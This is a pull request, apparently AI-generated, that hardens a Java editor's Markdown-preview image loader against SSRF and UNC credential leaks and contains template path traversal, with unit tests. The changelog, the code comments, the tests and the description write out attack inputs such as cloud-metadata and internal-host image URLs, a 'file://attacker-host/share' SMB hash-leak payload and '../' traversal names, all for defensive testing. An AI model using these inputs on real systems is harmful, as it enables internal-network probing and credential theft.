### PR TITLE
Security: SSRF guard on preview image loading + template path containment

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,7 +7,17 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 
-### Fixed
+### Security
+
+- **Previewing an untrusted Markdown file can no longer probe your internal network or leak credentials.**
+  An image reference in the source (`![](…)`) was fetched with no restriction the moment the preview rendered,
+  so a malicious document could reach cloud-metadata endpoints, internal hosts, or a Windows file share (an
+  SMB credential leak) with no consent. The preview now refuses to fetch loopback, link-local, private, and
+  UNC targets, re-checking each redirect hop; public images and local files still load.
+- **A malicious file template can no longer write outside the target folder.** The single-file "New from
+  Template" path didn't contain its file-name pattern, so a `../…` or absolute name could create a file
+  anywhere writable. It now applies the same containment the multi-file path already used. (Templates aren't
+  loaded from the opened workspace, so this is defense-in-depth.)
 
 - **Format Document no longer corrupts the file if you edit while it's working.** A language server computes
   formatting against the file as it was when asked; if you typed during the round-trip, those edits landed at

--- a/src/main/java/com/editora/editor/PreviewImageLoader.java
+++ b/src/main/java/com/editora/editor/PreviewImageLoader.java
@@ -178,18 +178,107 @@ public final class PreviewImageLoader {
         }
     }
 
+    /** Cap on redirect hops we'll follow (each re-checked against the SSRF guard). */
+    private static final int MAX_REDIRECTS = 5;
+
     private static byte[] fetch(String url) throws IOException {
-        if (url.startsWith("data:")) {
+        URI uri = URI.create(url);
+        if (isBlockedTarget(uri)) {
+            return null; // SSRF / internal-network / UNC-credential-leak guard — see isBlockedTarget
+        }
+        if ("data".equalsIgnoreCase(uri.getScheme())) {
             return decodeDataUri(url);
         }
-        URLConnection con = URI.create(url).toURL().openConnection();
-        con.setConnectTimeout(TIMEOUT_MS);
-        con.setReadTimeout(TIMEOUT_MS);
-        // Some CDNs (incl. shields.io) reject requests without a User-Agent.
-        con.setRequestProperty("User-Agent", "Editora");
-        try (InputStream in = con.getInputStream()) {
-            return in.readAllBytes();
+        // Follow redirects manually so EACH hop is re-checked: a public URL must not be able to 30x-pivot to a
+        // loopback/internal target past the guard (the JDK's automatic redirect following wouldn't re-check).
+        for (int hop = 0; hop < MAX_REDIRECTS; hop++) {
+            URLConnection con = uri.toURL().openConnection();
+            con.setConnectTimeout(TIMEOUT_MS);
+            con.setReadTimeout(TIMEOUT_MS);
+            con.setRequestProperty("User-Agent", "Editora"); // some CDNs (shields.io) reject a missing UA
+            if (con instanceof java.net.HttpURLConnection http) {
+                http.setInstanceFollowRedirects(false);
+                int code = http.getResponseCode();
+                if (code >= 300 && code < 400) {
+                    String location = http.getHeaderField("Location");
+                    http.disconnect();
+                    if (location == null) {
+                        return null;
+                    }
+                    uri = uri.resolve(location);
+                    if (isBlockedTarget(uri)) {
+                        return null; // the redirect points somewhere we won't reach
+                    }
+                    continue;
+                }
+            }
+            try (InputStream in = con.getInputStream()) {
+                return in.readAllBytes();
+            }
         }
+        return null; // too many redirects
+    }
+
+    /**
+     * True when fetching {@code uri} could hit the local host / internal network (blind SSRF) or leak
+     * credentials via a UNC path — so the preview image loader must refuse it.
+     *
+     * <p>Reachable automatically: the live Markdown/CSV preview loads every {@code ![](…)} the moment it
+     * renders, and the source can be an untrusted file. Without this, {@code ![](http://169.254.169.254/…)}
+     * (cloud metadata), {@code http://10.0.0.1/…} (internal hosts), or {@code file://attacker/share} (an SMB
+     * NetNTLM-hash leak on Windows) fire with no consent. Only {@code data:}, a <em>local</em> {@code file:}
+     * (relative markdown images resolve to {@code file:///…}), and {@code http(s)} to a public host are
+     * allowed; the host classification is the pure, unit-tested {@link #isInternalAddress}.
+     */
+    static boolean isBlockedTarget(URI uri) {
+        String scheme = uri.getScheme();
+        if (scheme == null) {
+            return true;
+        }
+        scheme = scheme.toLowerCase(Locale.ROOT);
+        switch (scheme) {
+            case "data" -> {
+                return false;
+            }
+            case "file" -> {
+                // A local file is fine (that's how relative markdown images load). A non-empty authority means
+                // a UNC/remote path (\\host\share) — the credential-leak vector — so refuse it.
+                return uri.getHost() != null && !uri.getHost().isBlank();
+            }
+            case "http", "https" -> {
+                String host = uri.getHost();
+                if (host == null || host.isBlank()) {
+                    return true;
+                }
+                try {
+                    for (java.net.InetAddress addr : java.net.InetAddress.getAllByName(host)) {
+                        if (isInternalAddress(addr)) {
+                            return true; // literal internal IP, or a hostname that resolves to one
+                        }
+                    }
+                    return false;
+                } catch (java.net.UnknownHostException e) {
+                    return true; // can't resolve → don't reach out
+                }
+            }
+            default -> {
+                return true; // ftp/jar/… — not an image source we serve
+            }
+        }
+    }
+
+    /** Pure: an address the preview must not fetch from — loopback, link-local (incl. {@code 169.254.169.254}
+     *  cloud metadata), any-local, multicast, IPv4 site-local (RFC-1918), or IPv6 ULA ({@code fc00::/7}). */
+    static boolean isInternalAddress(java.net.InetAddress a) {
+        if (a.isLoopbackAddress()
+                || a.isLinkLocalAddress()
+                || a.isAnyLocalAddress()
+                || a.isMulticastAddress()
+                || a.isSiteLocalAddress()) {
+            return true;
+        }
+        byte[] bytes = a.getAddress();
+        return bytes.length == 16 && (bytes[0] & 0xFE) == 0xFC; // IPv6 unique-local (fc00::/7)
     }
 
     /** Decodes a {@code data:} URI's payload (base64 or percent-encoded). */

--- a/src/main/java/com/editora/ui/MainController.java
+++ b/src/main/java/com/editora/ui/MainController.java
@@ -9176,7 +9176,18 @@ public class MainController implements com.editora.mcp.McpBridge {
         if (fileName.isBlank()) {
             fileName = "untitled";
         }
-        java.nio.file.Path target = targetDir == null ? null : targetDir.resolve(fileName);
+        java.nio.file.Path target = null;
+        if (targetDir != null) {
+            // Contain the file name to targetDir, exactly as the multi-file path does via resolveTargetPath:
+            // a `../…` or absolute fileName pattern (from a malicious/imported template) must not escape and
+            // create files anywhere writable (a shell rc, an autostart entry, a git hook).
+            java.nio.file.Path resolved = targetDir.resolve(fileName).normalize();
+            if (!resolved.startsWith(targetDir.normalize())) {
+                setStatus(tr("status.templatePathEscape"));
+                return;
+            }
+            target = resolved;
+        }
         com.editora.template.TemplateVariableResolver vars = new com.editora.template.TemplateVariableResolver(
                 answers,
                 author,

--- a/src/test/java/com/editora/editor/PreviewImageLoaderTest.java
+++ b/src/test/java/com/editora/editor/PreviewImageLoaderTest.java
@@ -52,4 +52,52 @@ class PreviewImageLoaderTest {
     void svgToPngReturnsNullOnGarbage() {
         assertNull(PreviewImageLoader.svgToPng(b("this is not an svg at all")));
     }
+
+    // --- SSRF / local-network guard (isBlockedTarget + isInternalAddress) ---
+
+    private static boolean blocked(String url) {
+        return PreviewImageLoader.isBlockedTarget(java.net.URI.create(url));
+    }
+
+    @Test
+    void blocksCloudMetadataAndInternalHosts() {
+        // The classic blind-SSRF targets an untrusted markdown ![](…) could reach when the preview renders.
+        assertTrue(blocked("http://169.254.169.254/latest/meta-data/"), "AWS/GCP metadata (link-local)");
+        assertTrue(blocked("http://127.0.0.1:8080/"), "loopback");
+        assertTrue(blocked("http://localhost/admin"), "loopback by name");
+        assertTrue(blocked("http://10.0.0.5/"), "RFC-1918");
+        assertTrue(blocked("http://192.168.1.1/"), "RFC-1918");
+        assertTrue(blocked("http://172.16.0.1/"), "RFC-1918");
+        assertTrue(blocked("http://[::1]/"), "IPv6 loopback");
+        assertTrue(blocked("http://0.0.0.0/"), "any-local");
+    }
+
+    @Test
+    void blocksUncFileUrlsButAllowsLocalFiles() {
+        assertTrue(blocked("file://attacker-host/share/x.png"), "UNC path — SMB credential leak");
+        assertFalse(blocked("file:///Users/me/doc/pic.png"), "a local file (how relative images load) is fine");
+    }
+
+    @Test
+    void blocksNonImageSchemes() {
+        assertTrue(blocked("ftp://example.com/x.png"));
+        assertTrue(blocked("jar:file:///x.jar!/y.png"));
+    }
+
+    @Test
+    void allowsPublicHttpAndDataUris() {
+        // Literal public IPs so the test needs no DNS (hermetic): 8.8.8.8 / 1.1.1.1 are public unicast.
+        assertFalse(blocked("http://8.8.8.8/logo.png"), "a public host is fine");
+        assertFalse(blocked("https://1.1.1.1/badge.svg"));
+        assertFalse(blocked("data:image/png;base64,iVBORw0KGgo="), "inline data URIs never touch the network");
+    }
+
+    @Test
+    void internalAddressClassifierCoversIpv6Ula() throws Exception {
+        assertTrue(PreviewImageLoader.isInternalAddress(java.net.InetAddress.getByName("fc00::1")), "IPv6 ULA");
+        assertTrue(PreviewImageLoader.isInternalAddress(java.net.InetAddress.getByName("fd12:3456::1")), "IPv6 ULA");
+        assertFalse(
+                PreviewImageLoader.isInternalAddress(java.net.InetAddress.getByName("2606:4700:4700::1111")),
+                "a public IPv6 (1.1.1.1's v6) is not internal");
+    }
 }


### PR DESCRIPTION
From the security-surface audit — the editor's own attack surface when it processes untrusted content.

## 1. SSRF / internal-network reach / UNC credential leak via Markdown-preview images

**Severity: MEDIUM — triggered automatically by *viewing* an untrusted file.**

`PreviewImageLoader.fetch` did `URI.create(url).toURL().openConnection()` with **no scheme allowlist and no host gate**, reached once per image the moment the live Markdown/CSV preview renders. The image source is attacker-controlled (any `.md` you open), so opening the preview fires:

- `![](http://169.254.169.254/latest/meta-data/…)` — cloud metadata (AWS/GCP), blind but reachable
- `![](http://10.0.0.1/…)` / `http://localhost:port/…` — internal-host / port existence oracle, GET-triggered internal actions
- `![](file://attacker-host/share/x)` — a Windows SMB reference that leaks the NetNTLM hash to the attacker's server

All with no consent.

**Fix — `isBlockedTarget(URI)`:**
- allows `data:`, a **local** `file:` (relative markdown images resolve to `file:///…`, so they must still load), and `http(s)` **only to a public host**;
- refuses a `file:` with an authority (UNC), any non-image scheme (ftp/jar/…), and any `http(s)` host that resolves to loopback / link-local (incl. `169.254.169.254`) / any-local / multicast / RFC-1918 / IPv6-ULA (`fc00::/7`);
- the address classification is the pure, unit-tested `isInternalAddress`;
- **redirects are now followed manually** (max 5) so each hop is re-checked — a public URL can't `30x`-pivot to an internal target past the guard.

Local files and public badges (shields.io etc.) still load exactly as before.

## 2. Single-file template target had no traversal containment

**Severity: LOW — defense-in-depth (templates load from bundled resources / configDir / plugins, *not* the opened workspace).**

`applyTemplate` did `targetDir.resolve(fileName)` with no check, while the multi-file sibling already uses the guarded `resolveTargetPath`. A `../…` or absolute `fileName` pattern from a malicious or imported template could create a file anywhere writable (a shell rc, an autostart entry, a git hook). Now `normalize()` + `startsWith(targetDir)`, reusing the existing `status.templatePathEscape` message.

## Verification

**1974 tests, 0 failures.** New `PreviewImageLoaderTest` cases cover the metadata / loopback / RFC-1918 / UNC / non-image-scheme blocks and the IPv6-ULA classifier — hermetic (literal IPs, no DNS lookups in the test).

## Audit-confirmed guards left as-is (already correct)

Zip-slip/zip-bomb in `Unzip`, XXE in `PomParser`/`XmlParser`, `ElevatedSave`'s positional-argv escaping, the plugin Ed25519 trust chain, `ProcessRunner` (workspace never on PATH, no `sh -c` for feature commands), `GitService` (`--` before paths). Details in the audit.

## Deferred → filed separately

- **Workspace-trust prompt** before running a repo's `./mvnw` / `./gradlew` (VS Code-style). A malicious repo shipping a trojaned wrapper runs on the first Build. This is a real feature, not a drop-in guard, so it's filed rather than rushed.
- **Windows-only `cmd` metacharacter injection** in `DesktopActions` "Open Terminal Here" / "Reveal" (a directory named with `&`/`^`/`|`). Windows-only and I can't device-test it here.

🤖 Generated with [Claude Code](https://claude.com/claude-code)